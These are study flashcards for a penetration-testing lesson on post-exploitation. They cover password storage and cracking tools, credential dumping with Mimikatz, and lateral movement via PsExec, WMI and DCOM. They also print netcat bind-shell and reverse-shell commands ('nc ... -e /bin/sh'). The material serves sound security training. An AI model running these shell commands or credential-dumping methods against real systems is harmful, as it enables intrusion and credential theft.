Lesson 16 - Leveraging the Attack Flashcards
What is the term for a file containing data captured from system memory
Dump File
What is the randomly generated string that can be added to a password before hashing
Salt
What is the brute-force attack in which multiple user accounts are tested with a dictionary of common passwords
Password Spraying
Where were Linux passwords originally stored, where are they stored currently, and why
/etc/passwd
/etc/shadow - uses a hashing algorithm that depends on the distribution
Most recently SHA-256 or SHA-512
Where does Windows store local usernames and passwords
Security Account Manager (SAM)
Passwords are stored as two hash types -
LanMan (LM) Hash.
NT Hash - simple MD4
What is LSASS in Windows
Windows Local Security Authority Subsystem Service - its LSA Secrets store password details
What is the password cracking tool that gathers credentials by extracting key elements from memory
Mimikatz
Modern password and hash cracking tool that can speed up the process by using different attack modes (dictionary, brute force, mask)
Hashcat
Parallel brute-forcer for network logins, focused on supporting numerous network services that allow remote authentication
Medusa
Tool that interprets the results of an Nmap scan to automatically start Medusa against open ports
Brutespray
Similar to Medusa but supports parallel testing of several network authentication protocols. Bundled with pw-inspector
Hydra
Highly optimized password cracker that can identify a large set of hash types with its community edition - multi-platform
John the Ripper
URL brute-forcer that comes bundled with different word lists geared towards web applications and site directories
DirBuster
Does Burp Suite have a password cracker
Yes - it has a module for that
What tools can I use for post-exploitation in a network that uses Windows AD
Responder.py
BloodhoundAD
Name some living-off-the-land (LotL) methods of performing lateral movement
PsExec, WMI, logging in using Telnet or SSH
Note - these can stand out to administrators
What are other methods for lateral movement that will not draw as much attention to the tester or hacker
Using RPC for inter-process communication between local and remote processes on Windows, then utilizing the Distributed Component Object Model (DCOM) to enable communication between software components
DCOM apps use RPC as a transport mechanism for client requests
The MMC20.Application object includes an ExecuteShellCommand() method
What are the two types of shell attacks
Bind shell - the target system binds its shell to a local port and the attacker's shell connects to it
Netcat is the most common tool
nc -lp 12345 -e /bin/sh
Reverse shell - a malicious remote command shell where the victim host opens the connection to the attacking host
Attacking host
nc -lp 12345
Target
nc 192…. 12345 -e /bin/sh
Reverse shells are more effective since they are outbound connections and not as affected by firewall rules
What is the type of password attack that creates variants and combinations of word list entries in an attempt to crack a password
Rule attack
What is the parameter of nc that allows multiple subsequent connections to a Windows bind shell
-L
What common Meterpreter command is not present in the PHP variant
getsystem